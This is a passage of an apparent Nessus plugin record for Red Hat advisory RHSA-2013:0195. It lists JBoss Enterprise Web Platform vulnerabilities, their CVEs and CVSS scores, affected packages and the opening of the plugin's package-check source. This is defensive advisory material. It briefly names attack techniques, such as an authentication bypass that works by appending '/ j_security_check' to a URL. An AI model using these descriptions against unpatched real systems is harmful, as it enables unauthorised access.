Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/ j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EWP (RHSA-2013:0195)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:hsqldb", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas-web", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-helpers", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations", "p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0195.NASL", "href": "https://www.tenable.com/plugins/nessus/78945", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0195. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78945);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0195\");\n\n script_name(english:\"RHEL 6 : JBoss EWP (RHSA-2013:0195)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple\nsecurity issues, various bugs, and add several enhancements are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Web Platform 5.1.2, and includes bug\nfixes and enhancements. As JBoss Enterprise Web Platform is a subset\nof JBoss Enterprise Application Platform, refer to the JBoss\nEnterprise Application Platform 5.2.0 Release Notes for information on\nthe most significant of these changes. The Release Notes will be\navailable shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator# authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/ j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", 